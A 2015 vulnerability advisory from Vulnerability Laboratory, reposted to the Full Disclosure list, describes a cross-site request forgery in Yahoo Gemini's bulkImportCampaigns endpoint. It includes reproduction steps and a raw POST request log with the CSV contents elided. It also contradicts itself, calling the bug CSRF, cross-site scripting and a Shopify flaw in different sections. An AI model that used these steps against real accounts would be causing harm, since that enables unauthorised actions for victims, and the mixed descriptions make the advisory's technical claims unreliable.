Document Title:
===============
Yahoo Bug Bounty #32 - CSRF bulkImport Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1552


Release Date:
=============
2015-09-03


Vulnerability Laboratory ID (VL-ID):
====================================
1552


Common Vulnerability Scoring System:
====================================
3.8


Product & Service Introduction:
===============================
Yahoo! Inc. is an American multinational internet corporation headquartered in 
Sunnyvale, California. It is widely 
known for its web portal, search engine Yahoo! Search, and related services, 
including Yahoo! Directory, Yahoo! Mail, 
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online 
mapping, video sharing, fantasy sports 
and its social media website. It is one of the most popular sites in the United 
States. According to news sources, 
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself 
claims it attracts `more than half a 
billion consumers every month in more than 30 languages.

(Copy of the Vendor Homepage: http://www.yahoo.com )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a script code inject 
web vulnerability in the official Shopify online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-07-05: Researcher Notification & Coordination (Hadji Samir)
2015-07-06: Vendor Notification (Security Team)
2015-09-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Yahoo!
Product: Gemini Yahoo - Online Service (Web-Application) 2015 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the 
official Yahoo online service web-application.
The vulnerability allows remote attacker to manipulate client-side 
web-application to browser request to compromise session data.

The vulnerability is located in the rest_call_back of the vulnerable 
`/advertiser/ajax/bulkImportCampaigns` module POSt method request.
Remote attackers with low privielege application user accounts are able to 
inject own malicious script code to compromise client-side 
app to browser requests. The request method to inject is POST and the attack 
vector is located on the client-side of the online-service.

The security risk of the cross site web vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 3.8. 
Exploitation of the cross site scripting web vulnerability requires no 
privileged web application user account and no user interaction. 
Successful exploitation results in client-side account theft by hijacking, 
client-side phishing, client-side external redirects and 
non-persistent manipulation of affected or connected service modules.

Request Method(s):
                                                        [+] POST
                                                        
Vulnerable Module(s):
                                                        [+] 
/advertiser/ajax/bulkImportCampaigns


Proof of Concept (PoC):
=======================
The client-side vulnerability can be exploited by remote attackers with low 
privilege web-application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Create page csrf poc 
2. The victim must login 
3. When the victim will open the page the file csv will upload and creat new 
Campaigns


Value Vulnerable: rest_call_back

--- PoC Session Logs [POST] ---
POST /advertiser/ajax/bulkImportCampaigns HTTP/1.1
Host: gemini.yahoo.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Access-Control-Allow-Origin: true
Referer: https://gemini.yahoo.com/advertiser/1021864/campaigns
Content-Length: 27740
Content-Type: multipart/form-data; 
boundary=---------------------------1423959968808241301368549351
Cookie:
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------1423959968808241301368549351
Content-Disposition: form-data; name="sourceType"
UNKNOWN
-----------------------------1423959968808241301368549351
Content-Disposition: form-data; name="file"; filename="bulkExample7.0.csv"
Content-Type: text/csv
.....
-----------------------------1423959968808241301368549351
Content-Disposition: form-data; name="advertiserId"
1021864
-----------------------------1423959968808241301368549351--

Response:
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Powered-By: Express
Vary: X-HTTP-Method-Override, Accept-Encoding
Content-Type: text/html; charset=utf-8
ETag: W/"e-20107a17"
Server: ATS
Date: Sat, 30 May 2015 13:55:43 GMT
Age: 0
Connection: keep-alive
Content-Length: 14


Reference(s):
http://gemini.yahoo.com/
http://gemini.yahoo.com/advertiser/
http://gemini.yahoo.com/advertiser/ajax/
http://gemini.yahoo.com/advertiser/ajax/bulkImportCampaigns


Security Risk:
==============
The security risk of the client-side POST inject web vulnerability in the 
web-application is estimated as medium. (CVSS 3.8)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [sa...@evolution-sec.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
                        - www.evolution-sec.com
Contact:    ad...@vulnerability-lab.com         - 
resea...@vulnerability-lab.com                        - ad...@evolution-sec.com
Section:    magazine.vulnerability-db.com       - 
vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
                        - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All 
other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To 
record, list (feed), modify, use or edit our material contact 
(ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a 
permission.

                                Copyright © 2015 | Vulnerability Laboratory - 
[Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com
PGP KEY: 
http://www.vulnerability-lab.com/keys/ad...@vulnerability-lab.com%280x198E9928%29.txt



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to